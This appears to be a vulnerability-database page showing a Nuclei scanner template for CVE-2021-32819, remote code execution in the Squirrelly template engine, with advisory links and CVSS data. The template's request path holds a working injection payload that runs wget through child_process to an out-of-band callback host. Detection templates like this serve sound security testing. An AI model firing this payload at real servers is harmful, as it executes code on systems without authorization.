| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Squirrelly | 12 Jun 202117:09 | – | githubexploit | |
| CVE-2021-32819 | 23 Jun 202614:06 | – | circl | |
| Squirrelly 信息泄露漏洞 | 14 May 202100:00 | – | cnnvd | |
| CVE-2021-32819 | 14 May 202100:00 | – | cve | |
| CVE-2021-32819 Remote code execution in squirrelly | 14 May 202100:00 | – | cvelist | |
| Insecure template handling in Squirrelly | 17 May 202120:58 | – | github | |
| CVE-2021-32819 | 14 May 202119:15 | – | nvd | |
| GHSA-Q8J6-PWQX-PM96 Insecure template handling in Squirrelly | 17 May 202120:58 | – | osv | |
| Remote code execution | 14 May 202119:15 | – | prion | |
| PT-2021-19952 · Unknown +1 · Squirrelly +1 | 14 May 202100:00 | – | ptsecurity |
id: CVE-2021-32819
info:
name: Nodejs Squirrelly - Remote Code Execution
author: pikpikcu
severity: high
description: |
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
- https://www.linuxlz.com/aqld/2331.html
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
- https://nvd.nist.gov/vuln/detail/CVE-2021-32819
- https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-32819
cwe-id: CWE-200,NVD-CWE-noinfo
epss-score: 0.59844
epss-percentile: 0.99018
cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: squirrelly
product: squirrelly
tags: cve2021,cve,nodejs,rce,oast,squirrelly,vkev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Wget"
# digest: 4a0a0047304502204762fb57d932e3340ae4da2dcf011b3f9eddc9873b1bccba3705c9ecd54dda92022100e9d61686cd3adfea6e9a6fd1b37c8f461fd7728566fdf7e34cf69322fe5bb915:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation